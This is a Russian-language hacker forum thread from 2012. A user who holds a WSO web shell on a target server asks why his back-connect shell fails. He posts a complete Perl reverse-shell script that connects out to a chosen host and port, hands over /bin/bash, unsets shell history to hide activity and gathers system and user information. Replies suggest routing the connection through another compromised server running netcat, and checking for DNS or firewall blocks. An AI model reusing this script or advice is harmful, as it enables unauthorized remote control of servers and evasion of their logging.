Проблема с bind/backconnect

Discussion in 'Linux, Freebsd, *nix' started by stan_q, 20 May 2012.

  1. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Имеется шелл wso на целевом сервере, стандартными тулзами бинд/бэк не устанавливаются - netcat просто закрывается.
    При запуске скрипта
    PHP:
    #!/usr/bin/perl
    use IO::Socket;
    $system '/bin/bash';
    $ARGC=@ARGV;
    print 
    "# <==BackConnect Shell==> \n\n";
    if (
    $ARGC!=2) {
     print 
    "Usage: $0 [Host] [Port] \n\n";
     die 
    "Ex: $0 127.0.0.1 1313 \n";
    }
    use 
    Socket;
    use 
    FileHandle;
    socket(SOCKETPF_INETSOCK_STREAMgetprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKETsockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print 
    "[*] Resolving HostName\n";
    print 
    "[*] Connecting… $ARGV[0] \n";
    print 
    "[*] Spawning Shell \n";
    print 
    "[*] Connected to remote host \n";
    print 
    "[*] Connection established\n";
    system
    SOCKET
    ->autoflush();
    open(STDIN">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
     print 
    "# <==BackConnect Shell==> \n\n";
    system("unset HISTFILE; unset SAVEHIST ;echo –==Systeminfo==– ; uname -a;echo;
    echo –==Userinfo==– ; id;echo;echo –==Directory==– ; pwd;echo; echo –==Shell==– ;echo –===Who==– ; whoami;echo; "
    );
    system($system);
    #EOF
    получаю сообщение
    Code:
    Unable to Resolve Host
    В качестве хоста выступает другой вебшелл, с установленным на сервере неткатом. Шелл проверенный, уверен, что проблема в целевом сервере.
    Подскажите, куда смотреть и что можно сделать?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    попробуй сначало приконектиться к одному шелу через неткат и поставь там порт на прослушку, а тот к которому не можешь подключиться, с него уже бек на тот шелл к которому ты уже подключился, заметел такую закономерность при таком способе что если шелы разных осей, то такая схема не всегда получается...
     
    _________________________
  3. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Собственно, так я и делаю.
    Меня смущает ответ "Unable to Resolve Host", может, файрвол, который блочит исходящий трафик?
     
  4. emomasson

    emomasson Member

    Joined:
    27 Jul 2010
    Messages:
    174
    Likes Received:
    12
    Reputations:
    5
    проверь может действительно ресольва нет.. или запросы блокаются или с днсниками косяки.